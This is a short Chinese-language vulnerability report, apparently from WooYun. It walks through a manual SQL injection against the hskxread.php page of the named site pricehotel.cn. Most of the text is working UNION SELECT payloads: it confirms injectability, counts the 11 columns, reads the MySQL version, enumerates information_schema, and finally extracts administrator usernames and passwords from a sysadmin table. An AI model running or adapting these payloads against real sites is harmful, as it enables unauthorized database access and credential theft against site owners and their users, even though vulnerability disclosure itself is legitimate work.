WooYun.org

1.查找注入点
http://www.pricehotel.cn/hskxread.php?id=1638

注入 效果
‘ 出错

and 1=1 正常

and 1=2 出错
结论：可注入。

2.获取数据
2.1 确定字段数
http://www.pricehotel.cn/hskxread.php?id=1638 order by 20 --

依照此方法进行如下尝试：
注入 效果
order by 20 -- 出错
order by 10 -- 正常
order by 12-- 出错
order by 11 -- 正常
结论：注入点查询的数据表有11列
2.2 获得数据显示位置
http://www.pricehotel.cn/hskxread.php?id=1638 and 1=2 union all select 1,2,3,4,5,6,7,8,9,10,11 --

信息：2，3，5处可利用来显示查询到的信息。
2.3 获取数据库信息
and 1=2 union all select 1,@@version,3,4,5,6,7,8,9,10,11 --
图略

信息：数据库版本MySQL 5.5.23-log。
2.4提取目标数据
and 1=2 union all select 1,table_schema,3,4,5,6,7,8,9,10,11 from information_schema.tables—
图略

信息：information_schema数据库。
由于页面显示局限，仅能显示一条信息，不能罗列所有数据表，故采用工具。

若工具没有读出具体数据，只获取了表名、列名也可以手工注入获取数据信息。
and 1=2 union select 1,admin_pwd,admin_name,4,5,6,7,8,9,10,11 from pricehoteldb.sysadmin --